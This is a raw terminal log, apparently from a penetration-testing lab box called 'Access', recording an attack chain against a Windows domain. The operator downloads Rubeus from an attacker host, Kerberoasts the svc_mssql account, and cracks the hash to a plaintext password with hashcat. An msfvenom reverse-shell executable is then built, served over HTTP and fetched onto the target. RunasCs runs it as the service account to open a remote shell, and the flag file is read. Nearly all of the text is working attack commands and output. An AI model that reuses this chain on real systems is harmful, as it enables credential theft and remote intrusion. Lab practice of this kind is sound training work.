svc_mssql
PS C:\programdata> curl 192.168.45.169/Rubeus.exe -o Rubeus.exe
PS C:\programdata> .\Rubeus.exe kerberoast /outfile:hashes.kerberoast
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain : access.offsec
[*] Searching path 'LDAP://SERVER.access.offsec/DC=access,DC=offsec' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 1
[*] SamAccountName : svc_mssql
[*] DistinguishedName : CN=MSSQL,CN=Users,DC=access,DC=offsec
[*] ServicePrincipalName : MSSQLSvc/DC.access.offsec
[*] PwdLastSet : 5/21/2022 5:33:45 AM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\programdata\hashes.kerberoast
[*] Roasted hashes written to : C:\programdata\hashes.kerberoast
PS C:\programdata> type C:\programdata\hashes.kerberoast
type C:\programdata\hashes.kerberoast
$krb5tgs$23$*svc_mssql$access.offsec$MSSQLSvc/DC.access.offsec@access.offsec*$6B9F9783A7655D841C4EC6EC5C800AE5$CD94050386E8A9D212228732D06E67E0F8EFD67C89F80F78D9F2CD967E2411A0D7CB03E875DB33B1F85254B783E519AB83F93E4B66B2603AB65B13C199BA5F39B3AE1F6B6B9BE8C719232626F6400BB486FA4F314AAEAFB9043D527E8A7C30D10548953E92201D4995FAC2FB31B88CBF69764742681B348CB4464C96ADDC2FEE677E82532ACBAE9C6A81EE0CA8622DF3E6660683862165F78F80D332C45888A78F3105E80615C6BE5579EE84CD8E8C9C5ADBF313F6045635769D9A69A2745A6D87F278EBC7E82856CACF241F86CA69F72EE08D54BCD060EB9249B563960BF4055274181F676231D80DBD9C749CE89C27CF8B4C60812FF2B17D0C30932895E92985AED780A32F5F399011758BBF9A51C4D8A86D8464F4BF42E2BC8C054AA127C86258C96477592D56275BD4FE5593C945DF7AEFD70349D7B1B7F6E5222D8D19F1FBE22BA27341EA224DBEF9640108B76B7157B8AB900CB096309CA82B3F07CE32D38B216459549D42ABF887386C31BF9E73EEBCDA92F7C1EDC2A57D6396706CE4099A7058348FAAA1A39B5463A1461F8D34CF1DEBDBA46FE60A26C0DB0E6002973DB7D7CF1E7CA160420E3DDB7B8EDB398A27B4480175C8A7148436E73E2D441BAC43CC048471352F11F2606CF955A02329DAE011C509D095D3144C70D4219BFB33CCAF5273DC50738C1B5D6AB0EA382C32CD0F7BCA0792EE250DD6C4303712CB28ED857FE68237E8A110EAB884257C8F7CBD6E5DF4C10905B2E38A817C5963FDF230E08ED3B3AB91F4715FCE408B4CA80072FF84AD07BD9F700AD9C10FD17E0114FAD1CA2046E3F295338A3F9CB11EF5944712025B7DBF78954D99CB4A7703EF8DC743A2E3A7901A6B9309DC7A1D276C680F7074047ECE5D8312963908D182AE32D9E8544913075E5A9A8AE073642835311FD690B8DC8C196DEE0F4F47867646A0F9AB4B888E4E27558E6076AE142DE551200CE6DDFC3D55539B37F601E6B33AED7CC6CDBFCC5E59DC6144D371543391AD505B3A441B9F43ECF60A4B76DAD45CE2D2FC2EDB4AE6AF96866569C6902BF1AA5C1C89544F2DECF06A19E85C12854FAECA7B36383DA2CF566D27A6CF6956E68D15C19597EB4FBFE46BF02F76D6C21454C22F05101D066CEB29778050B35E484B0E571D22256CEE0DA6ECE713EF6596574FC25D9F7C6C03E0429A51BB8BD02FFD3496FEFAB6656F9E0F76AECCD7043237A22A4135E50DCCB380BF14B58FCC587392BD030C66A8EAC176C5EF0B3ABF84B8841C99073993C44FD5237B900B7355032C5B40E1F2BD0AEEDDEDB2E3705BADEA27FC54325AE9CABB82E03FBB0F9449D
57C7CC50F5A7D7E3450783DEE656DDD60D6A9E4A2B6B6051EA00166ED6E3F921D0C417481F8495D1EDCF5BC104CC389713D895A2C942F8EEF2FDD53134CFD9A8240B776CA6DCF038A6051A4FD9DD1A15327BEFA1287BB85F15A71AC1C6BE84B4F1559A55E86AA796993DE9BAF7F06088B989122FE20A4C0089937AE01815BBA590C2E7501FD66A5E807D7FE8880284594153C1EA94664C9AE00F4D3FA229EFD8969F29D30E60EAE44B5070654E04E7DD7F8036AEA62CAC17C7734054564676693C0
$ vi svc_sql.hash
$ hashcat -m 13100 svc_sql.hash ~/rockyou.txt -O
svc_sql:trustno1
$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.169 LPORT=1338 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
$ nc -lnvp 1338
listening on [any] 1338 ...
PS C:\programdata> curl 192.168.45.169/shell.exe -o shell.exe
PS C:\programdata> curl 192.168.45.233/Invoke-RunasCs.ps1 -o Invoke-RunasCs.ps1
PS C:\programdata> Import-Module .\Invoke-RunasCs.ps1
$ nc -lnvp 1338
listening on [any] 1338 ...
Invoke-RunasCs svc_mssql trustno1 'C:\programdata\shell.exe'
$ nc -lnvp 1338
listening on [any] 1338 ...
connect to [192.168.45.233] from (UNKNOWN) [192.168.170.187] 49862
Microsoft Windows [Version 10.0.17763.2746]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
access\svc_mssql
C:\Windows\system32>type C:\Users\svc_mssql\Desktop\local.txt
type C:\Users\svc_mssql\Desktop\local.txt
f028fdace958435f09b790598d428dba
C:\Windows\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.170.187
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.170.254